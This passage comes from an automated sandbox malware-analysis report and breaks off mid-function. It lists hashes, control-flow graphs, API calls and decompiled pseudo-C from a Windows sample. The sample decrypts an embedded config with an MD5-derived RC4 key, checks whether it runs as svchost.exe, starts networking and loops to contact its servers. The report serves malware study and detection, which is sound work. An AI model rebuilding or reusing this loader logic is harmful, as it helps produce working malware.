                                                                                                                                                                                                                                                                                                        • API String ID: 880997049-2804282621
                                                                                                                                                                                                                                                                                                        • Opcode ID: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                                                        • Instruction ID: 104ecec6680c69d5e391cf9d7718dbecb1b5f59d1f4ca396f8eadafade2250d2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89C10BB19442189BFB64CF50CC49FD9B7B5EB88704F0481D9E60DAA2C0DB7AAAD4CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 709 40047f0-4004801 710 4004807-400480e 709->710 711 4004aab-4004ab1 709->711 710->711 712 4004814-4004832 CryptAcquireContextA 710->712 713 4004834-400483f GetLastError 712->713 714 4004856-400485a 712->714 713->714 716 4004841-4004850 CryptAcquireContextA 713->716 714->711 715 4004860-400489d 714->715 718 40048a3-40048f3 call 4007b70 CryptCreateHash 715->718 719 4004a9f-4004aa5 CryptReleaseContext 715->719 716->714 722 4004a90-4004a96 718->722 723 40048f9-4004913 CryptHashData 718->723 719->711 724 4004a98 722->724 725 4004a9a 722->725 726 4004a83-4004a8a CryptDestroyHash 723->726 727 4004919-4004944 CryptDeriveKey 723->727 724->719 725->719 726->722 727->726 728 400494a-400498f CryptDecrypt CryptDestroyKey 727->728 728->726 729 4004995-40049b1 CryptCreateHash 728->729 729->726 730 40049b7-40049d4 CryptHashData 729->730 731 4004a76-4004a7d CryptDestroyHash 730->731 732 40049da-4004a0f CryptGetHashParam 730->732 731->726 732->731 733 4004a11-4004a3c CryptGetHashParam 732->733 733->731 734 4004a3e-4004a58 call 4007c70 733->734 734->731 737 4004a5a-4004a72 call 4007b70 734->737 737->731
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                        			E040047F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				signed int _v5;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				char _v764;
                                                                                                                                                                                                                                                                                                        				char _v780;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v784;
                                                                                                                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                                                                                                                        				int _v792;
                                                                                                                                                                                                                                                                                                        				int _v796;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v800;
                                                                                                                                                                                                                                                                                                        				long* _v804;
                                                                                                                                                                                                                                                                                                        				int _v808;
                                                                                                                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                                                                                                                        				char _v816;
                                                                                                                                                                                                                                                                                                        				int _v820;
                                                                                                                                                                                                                                                                                                        				char _v824;
                                                                                                                                                                                                                                                                                                        				char _v828;
                                                                                                                                                                                                                                                                                                        				char _v844;
                                                                                                                                                                                                                                                                                                        				int _t61;
                                                                                                                                                                                                                                                                                                        				char* _t67;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                                                                                                                        				char* _t73;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                                                                                                                        				signed char _t78;
                                                                                                                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 <= 0x300) {
                                                                                                                                                                                                                                                                                                        					L25:
                                                                                                                                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t61 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                                                                                                                                        						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v788 = 0x10;
                                                                                                                                                                                                                                                                                                        						_v784 = 0x10;
                                                                                                                                                                                                                                                                                                        						_v792 = 0;
                                                                                                                                                                                                                                                                                                        						while(_v792 < _a8 - 0x2ff) {
                                                                                                                                                                                                                                                                                                        							E04007B70( &_v780, _a4 + _v792, 0x300);
                                                                                                                                                                                                                                                                                                        							_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                                        							_t67 =  &_v780;
                                                                                                                                                                                                                                                                                                        							_v800 = _t67;
                                                                                                                                                                                                                                                                                                        							_v796 = 0;
                                                                                                                                                                                                                                                                                                        							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796);
                                                                                                                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                                                                                                                        								if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        									_v792 = _v792 + 1;
                                                                                                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t68 = _v800;
                                                                                                                                                                                                                                                                                                        							__imp__CryptHashData(_v796, _t68, 0x10, 0);
                                                                                                                                                                                                                                                                                                        							if(_t68 != 0) {
                                                                                                                                                                                                                                                                                                        								_v804 = 0;
                                                                                                                                                                                                                                                                                                        								_t69 = _v796;
                                                                                                                                                                                                                                                                                                        								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
                                                                                                                                                                                                                                                                                                        								if(_t69 != 0) {
                                                                                                                                                                                                                                                                                                        									_v812 = 0x2f0;
                                                                                                                                                                                                                                                                                                        									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
                                                                                                                                                                                                                                                                                                        									CryptDestroyKey(_v804);
                                                                                                                                                                                                                                                                                                        									if(_v808 != 0) {
                                                                                                                                                                                                                                                                                                        										_t73 =  &_v816;
                                                                                                                                                                                                                                                                                                        										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73);
                                                                                                                                                                                                                                                                                                        										if(_t73 != 0) {
                                                                                                                                                                                                                                                                                                        											_t74 = _v816;
                                                                                                                                                                                                                                                                                                        											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
                                                                                                                                                                                                                                                                                                        											if(_t74 != 0) {
                                                                                                                                                                                                                                                                                                        												_v820 = 0;
                                                                                                                                                                                                                                                                                                        												_v824 = 4;
                                                                                                                                                                                                                                                                                                        												_t76 = _v816;
                                                                                                                                                                                                                                                                                                        												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
                                                                                                                                                                                                                                                                                                        												if(_t76 != 0) {
                                                                                                                                                                                                                                                                                                        													_v828 = 0x10;
                                                                                                                                                                                                                                                                                                        													_t77 = _v816;
                                                                                                                                                                                                                                                                                                        													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
                                                                                                                                                                                                                                                                                                        													if(_t77 != 0) {
                                                                                                                                                                                                                                                                                                        														_t78 = E04007C70( &_v28,  &_v844,  &_v28, 0x10);
                                                                                                                                                                                                                                                                                                        														_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                                        														if((_t78 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        															E04007B70(_a12,  &_v780, 0x300);
                                                                                                                                                                                                                                                                                                        															_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                                        															_v5 = 1;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											__imp__CryptDestroyHash(_v816);
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__imp__CryptDestroyHash(_v796);
                                                                                                                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}































                                                                                                                                                                                                                                                                                                        0x040047f9
                                                                                                                                                                                                                                                                                                        0x04004801
                                                                                                                                                                                                                                                                                                        0x04004aab
                                                                                                                                                                                                                                                                                                        0x04004ab1
                                                                                                                                                                                                                                                                                                        0x04004814
                                                                                                                                                                                                                                                                                                        0x04004814
                                                                                                                                                                                                                                                                                                        0x0400482a
                                                                                                                                                                                                                                                                                                        0x04004832
                                                                                                                                                                                                                                                                                                        0x04004850
                                                                                                                                                                                                                                                                                                        0x04004850
                                                                                                                                                                                                                                                                                                        0x0400485a
                                                                                                                                                                                                                                                                                                        0x04004860
                                                                                                                                                                                                                                                                                                        0x0400486a
                                                                                                                                                                                                                                                                                                        0x04004874
                                                                                                                                                                                                                                                                                                        0x0400488f
                                                                                                                                                                                                                                                                                                        0x040048b9
                                                                                                                                                                                                                                                                                                        0x040048be
                                                                                                                                                                                                                                                                                                        0x040048c1
                                                                                                                                                                                                                                                                                                        0x040048c7
                                                                                                                                                                                                                                                                                                        0x040048cd
                                                                                                                                                                                                                                                                                                        0x040048eb
                                                                                                                                                                                                                                                                                                        0x040048f3
                                                                                                                                                                                                                                                                                                        0x04004a90
                                                                                                                                                                                                                                                                                                        0x04004a96
                                                                                                                                                                                                                                                                                                        0x04004889
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04004889
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04004a98
                                                                                                                                                                                                                                                                                                        0x040048fd
                                                                                                                                                                                                                                                                                                        0x0400490b
                                                                                                                                                                                                                                                                                                        0x04004913
                                                                                                                                                                                                                                                                                                        0x04004919
                                                                                                                                                                                                                                                                                                        0x0400492c
                                                                                                                                                                                                                                                                                                        0x0400493c
                                                                                                                                                                                                                                                                                                        0x04004944
                                                                                                                                                                                                                                                                                                        0x0400494a
                                                                                                                                                                                                                                                                                                        0x04004975
                                                                                                                                                                                                                                                                                                        0x04004982
                                                                                                                                                                                                                                                                                                        0x0400498f
                                                                                                                                                                                                                                                                                                        0x04004995
                                                                                                                                                                                                                                                                                                        0x040049a9
                                                                                                                                                                                                                                                                                                        0x040049b1
                                                                                                                                                                                                                                                                                                        0x040049c5
                                                                                                                                                                                                                                                                                                        0x040049cc
                                                                                                                                                                                                                                                                                                        0x040049d4
                                                                                                                                                                                                                                                                                                        0x040049da
                                                                                                                                                                                                                                                                                                        0x040049e4
                                                                                                                                                                                                                                                                                                        0x04004a00
                                                                                                                                                                                                                                                                                                        0x04004a07
                                                                                                                                                                                                                                                                                                        0x04004a0f
                                                                                                                                                                                                                                                                                                        0x04004a11
                                                                                                                                                                                                                                                                                                        0x04004a2d
                                                                                                                                                                                                                                                                                                        0x04004a34
                                                                                                                                                                                                                                                                                                        0x04004a3c
                                                                                                                                                                                                                                                                                                        0x04004a4b
                                                                                                                                                                                                                                                                                                        0x04004a50
                                                                                                                                                                                                                                                                                                        0x04004a58
                                                                                                                                                                                                                                                                                                        0x04004a6a
                                                                                                                                                                                                                                                                                                        0x04004a6f
                                                                                                                                                                                                                                                                                                        0x04004a72
                                                                                                                                                                                                                                                                                                        0x04004a72
                                                                                                                                                                                                                                                                                                        0x04004a58
                                                                                                                                                                                                                                                                                                        0x04004a3c
                                                                                                                                                                                                                                                                                                        0x04004a0f
                                                                                                                                                                                                                                                                                                        0x04004a7d
                                                                                                                                                                                                                                                                                                        0x04004a7d
                                                                                                                                                                                                                                                                                                        0x040049b1
                                                                                                                                                                                                                                                                                                        0x0400498f
                                                                                                                                                                                                                                                                                                        0x04004944
                                                                                                                                                                                                                                                                                                        0x04004a8a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04004a8a
                                                                                                                                                                                                                                                                                                        0x04004aa5
                                                                                                                                                                                                                                                                                                        0x04004aa5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400485a

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                                                        • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04004845
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400481F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 2739279601-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                                                        • Instruction ID: 68028e15a08110d1318f396c41aabee13b9dff780772823a15a50aa733777c46
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E71DF71A54318ABFB65CF50CC45BED77BCAB48B04F408598A605BA1C0DBB9ABC4CF54
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 799 4003b00-4003b5c call 4001000 call 4003130 call 4002ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 4004510 808 4003b62-4003c8c call 4007d20 call 4005700 call 4005a00 call 4007d20 call 4009400 call 40099f0 call 4006060 call 4005e00 StrStrIA call 4001120 call 4005e30 call 4006cf0 call 4005f30 call 4009b90 WSAStartup 799->808 809 400400a-400400c ExitProcess 799->809 808->809 836 4003c92-4003cb1 808->836 837 4003cc0-4003cc9 836->837 838 4003cb3-4003cbb 836->838 839 4003cda-4003ce3 837->839 840 4003ccb-4003cd4 837->840 838->837 841 4003cf4-4003cfd 839->841 842 4003ce5-4003cee 839->842 840->839 843 4003d0c-4003d15 841->843 844 4003cff-4003d07 841->844 842->841 845 4003d26-4003d2f 843->845 846 4003d17-4003d20 843->846 844->843 847 4003d40-4003dfd call 4007d20 call 400a700 call 400a4b0 call 4005b50 call 4008a70 845->847 848 4003d31-4003d3a 845->848 846->845 859 4003e49 847->859 860 4003dff-4003e3f call 4007d20 call 40078d0 847->860 848->847 862 4003e53-4003eab call 4007970 call 4004020 859->862 860->859 870 4003eb1-4003ed9 call 4004020 862->870 871 4003f8a 862->871 877 4003f81 870->877 878 4003edf-4003efa call 4004020 870->878 873 4003f91-4003f9a 871->873 875 4003f9c-4003fa3 873->875 876 4003fed-4003ffa Sleep 873->876 879 4003fd0-4003fd7 875->879 880 4003fa5-4003fac 875->880 876->809 876->862 881 4003f88 877->881 886 4003eff-4003f07 878->886 879->876 885 4003fd9-4003fe3 879->885 883 4003fc4 880->883 884 4003fae-4003fc2 880->884 881->873 887 4003fce 883->887 884->887 885->876 888 4003f78 886->888 889 4003f09-4003f50 call 40042e0 call 4004020 886->889 887->876 890 4003f7f 888->890 895 4003f52 889->895 896 4003f59-4003f60 889->896 890->881 895->896 897 4003f62-4003f70 VirtualFree 896->897 898 4003f76 896->898 897->898 898->890
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                                        			_entry_() {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				char _v1148;
                                                                                                                                                                                                                                                                                                        				signed char _v1149;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1156;
                                                                                                                                                                                                                                                                                                        				char _v1556;
                                                                                                                                                                                                                                                                                                        				char _v9556;
                                                                                                                                                                                                                                                                                                        				long _v9560;
                                                                                                                                                                                                                                                                                                        				char _v9564;
                                                                                                                                                                                                                                                                                                        				char _v12068;
                                                                                                                                                                                                                                                                                                        				signed int _v12072;
                                                                                                                                                                                                                                                                                                        				char _v12076;
                                                                                                                                                                                                                                                                                                        				long _v12080;
                                                                                                                                                                                                                                                                                                        				char _v12081;
                                                                                                                                                                                                                                                                                                        				long _v12088;
                                                                                                                                                                                                                                                                                                        				long _v12092;
                                                                                                                                                                                                                                                                                                        				long _v12096;
                                                                                                                                                                                                                                                                                                        				signed int _v12100;
                                                                                                                                                                                                                                                                                                        				signed char _v12101;
                                                                                                                                                                                                                                                                                                        				long _v12108;
                                                                                                                                                                                                                                                                                                        				signed int _v12112;
                                                                                                                                                                                                                                                                                                        				void* _v12116;
                                                                                                                                                                                                                                                                                                        				signed char _t69;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                                                                                                                                                        				signed char _t77;
                                                                                                                                                                                                                                                                                                        				signed char _t79;
                                                                                                                                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                                                                                                                                        				signed char _t85;
                                                                                                                                                                                                                                                                                                        				signed char _t86;
                                                                                                                                                                                                                                                                                                        				signed char _t87;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                                                                                                                        				char* _t89;
                                                                                                                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                                                                                                                                        				signed char _t102;
                                                                                                                                                                                                                                                                                                        				signed char _t104;
                                                                                                                                                                                                                                                                                                        				signed char _t106;
                                                                                                                                                                                                                                                                                                        				signed char _t110;
                                                                                                                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                                                                                                                        				signed int _t118;
                                                                                                                                                                                                                                                                                                        				char _t125;
                                                                                                                                                                                                                                                                                                        				signed int _t138;
                                                                                                                                                                                                                                                                                                        				signed int _t140;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                                                                                                                                                        				signed int _t161;
                                                                                                                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                                                                                                                        				void* _t173;
                                                                                                                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				E04001000(0x2f50);
                                                                                                                                                                                                                                                                                                        				_v8 = E04003130();
                                                                                                                                                                                                                                                                                                        				E04002ED0(_v8);
                                                                                                                                                                                                                                                                                                        				GetModuleFileNameA(0, "C:\Users\alfons\pigalicapi.exe", 0x208);
                                                                                                                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E04005DB0); // executed
                                                                                                                                                                                                                                                                                                        				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                                                                        				_t69 = E04004510(_v8, 0x4013c88); // executed
                                                                                                                                                                                                                                                                                                        				_t165 = _t163 + 0xc;
                                                                                                                                                                                                                                                                                                        				if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                                                                                                                        					ExitProcess(0);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				E04007D20( &_v1148,  &_v1148, 0, 0x46b);
                                                                                                                                                                                                                                                                                                        				E04005700( &_v1148); // executed
                                                                                                                                                                                                                                                                                                        				_t143 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                                        				_t74 = E04005A00( &_v1148, _t143, 0xff); // executed
                                                                                                                                                                                                                                                                                                        				_v1156 = _t74;
                                                                                                                                                                                                                                                                                                        				E04007D20(_t74, "Hogerfazwafx", 0, 0x12c);
                                                                                                                                                                                                                                                                                                        				E04009400( &_v1148, "Hogerfazwafx", 0xa); // executed
                                                                                                                                                                                                                                                                                                        				_t77 = E040099F0(); // executed
                                                                                                                                                                                                                                                                                                        				 *0x401435a = _t77;
                                                                                                                                                                                                                                                                                                        				 *0x401435d = E04006060(); // executed
                                                                                                                                                                                                                                                                                                        				_t79 = E04005E00(); // executed
                                                                                                                                                                                                                                                                                                        				 *0x401435e = _t79;
                                                                                                                                                                                                                                                                                                        				_t80 = StrStrIA("C:\Users\alfons\pigalicapi.exe", "svchost.exe"); // executed
                                                                                                                                                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                                        				 *0x4014362 =  ~( ~_t80);
                                                                                                                                                                                                                                                                                                        				E04001120("C:\Users\alfons\pigalicapi.exe", "pigalicapi",  *0x401435a & 0x000000ff,  *0x4014362 & 0x000000ff, 0x401436c); // executed
                                                                                                                                                                                                                                                                                                        				_t85 = E04005E30(0); // executed
                                                                                                                                                                                                                                                                                                        				 *0x401435b = _t85;
                                                                                                                                                                                                                                                                                                        				 *0x401435f = 1; // executed
                                                                                                                                                                                                                                                                                                        				_t86 = E04006CF0(); // executed
                                                                                                                                                                                                                                                                                                        				_v1149 = _t86;
                                                                                                                                                                                                                                                                                                        				_t87 = E04005F30(); // executed
                                                                                                                                                                                                                                                                                                        				 *0x401435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        				_t88 = E04009B90(0xffffffff);
                                                                                                                                                                                                                                                                                                        				_t173 = _t165 + 0x50;
                                                                                                                                                                                                                                                                                                        				 *0x4014364 = _t88;
                                                                                                                                                                                                                                                                                                        				_t89 =  &_v1556;
                                                                                                                                                                                                                                                                                                        				_push(_t89);
                                                                                                                                                                                                                                                                                                        				_push(0x202); // executed
                                                                                                                                                                                                                                                                                                        				L0400B1E6(); // executed
                                                                                                                                                                                                                                                                                                        				if(_t89 != 0) {
                                                                                                                                                                                                                                                                                                        					goto L39;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t125 =  *0x40119a8; // 0x1d
                                                                                                                                                                                                                                                                                                        					_v12081 = _t125;
                                                                                                                                                                                                                                                                                                        					 *0x4014378 = 0x10;
                                                                                                                                                                                                                                                                                                        					if(( *0x401435f & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t118 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                                        						 *0x4014378 = _t118 | 0x00000008;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *0x401435c & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t161 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                                        						 *0x4014378 = _t161 | 0x00000001;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t140 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                                        						 *0x4014378 = _t140 | 0x00000004;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *0x401435e & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t116 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                                        						 *0x4014378 = _t116 | 0x00000002;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *0x4014360 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t159 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                                        						 *0x4014378 = _t159 | 0x00000020;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t91 =  *0x4014361 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					if(( *0x4014361 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t138 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                                        						 *0x4014378 = _t138 | 0x00000040;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v9564 = 0x9c3;
                                                                                                                                                                                                                                                                                                        					E04007D20(_t91,  &_v12068, 0, 0x9c4);
                                                                                                                                                                                                                                                                                                        					E0400A700();
                                                                                                                                                                                                                                                                                                        					E0400A4B0( &_v12068,  &_v9564, 0x4013cb6,  *0x4013cb4 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                        					_v9560 = 0;
                                                                                                                                                                                                                                                                                                        					_t97 = E04005B50( &_v12068, ";",  &_v9560, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v12072 = _t97;
                                                                                                                                                                                                                                                                                                        					_v12092 = 0;
                                                                                                                                                                                                                                                                                                        					_v12080 = 0;
                                                                                                                                                                                                                                                                                                        					_v12076 = 0x4b0;
                                                                                                                                                                                                                                                                                                        					_t98 = E04008A70(0x4012c34,  &_v12076, 0x4012ba8, 0x8c, 0x400e008, 0x254); // executed
                                                                                                                                                                                                                                                                                                        					_t177 = _t173 + 0x44;
                                                                                                                                                                                                                                                                                                        					if(_t98 != 0) {
                                                                                                                                                                                                                                                                                                        						E04007D20( &_v9556,  &_v9556, 0, 0x1f40);
                                                                                                                                                                                                                                                                                                        						E040078D0(0x4012c34, 0xc8,  &_v9556, 0xc8);
                                                                                                                                                                                                                                                                                                        						_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                                        						_v12092 =  &_v9556;
                                                                                                                                                                                                                                                                                                        						_v12080 = 0xc8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v12088 = 0;
                                                                                                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                                                                                                        					_v12101 = 0;
                                                                                                                                                                                                                                                                                                        					_v12108 = 0x1d4c0;
                                                                                                                                                                                                                                                                                                        					_v12096 = 0;
                                                                                                                                                                                                                                                                                                        					_t100 = E04007970( &_v12096); // executed
                                                                                                                                                                                                                                                                                                        					_v12100 = _t100;
                                                                                                                                                                                                                                                                                                        					_t102 = E04004020(_v12096, _v12100,  &_v1148, 1, 2, 0);
                                                                                                                                                                                                                                                                                                        					_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                                        					if((_t102 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_v12101 = 1;
                                                                                                                                                                                                                                                                                                        					} else {
